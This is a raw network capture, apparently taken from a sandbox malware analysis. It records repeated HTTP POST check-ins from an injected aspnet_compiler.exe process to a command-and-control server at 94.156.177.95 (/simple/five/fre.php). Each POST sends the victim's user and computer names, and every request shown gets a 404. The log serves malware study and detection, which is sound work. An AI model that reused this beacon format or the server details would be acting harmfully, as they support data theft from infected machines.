Nov 15, 2024 18:14:41.016753912 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:41.021819115 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:42.015927076 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:42.164769888 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:42.169694901 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:43.118540049 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:43.289971113 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:43.295006037 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:44.288290024 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:44.442001104 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:44.446887970 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:45.435973883 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:45.585858107 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:45.590810061 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:46.563261032 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:46.709453106 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:46.714498043 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:47.660944939 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:47.876998901 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:47.882050991 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:48.863275051 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:49.029119968 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:49.034111977 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:49.974807024 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:50.178024054 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:50.182971001 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:51.170826912 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:51.314537048 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:51.319509029 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:52.290635109 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:52.448914051 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:52.454052925 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:53.435466051 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:53.586914062 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:53.594420910 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:54.533124924 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:54.689611912 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:54.694504976 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:56.696182966 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:56.892213106 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:56.897576094 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:57.891151905 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49765	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:58.043782949 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:58.049519062 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:58.995851040 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49767	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:59.156507015 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:59.161813974 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:00.106925011 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49773	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:00.306016922 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:00.310997009 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:01.274903059 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49779	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:01.428194046 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:01.433269978 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:02.623159885 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49785	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:02.769289970 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:02.774194002 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:03.754801989 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49795	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:03.937114954 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:03.942454100 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:04.921854019 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49802	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:05.069040060 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:05.073941946 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
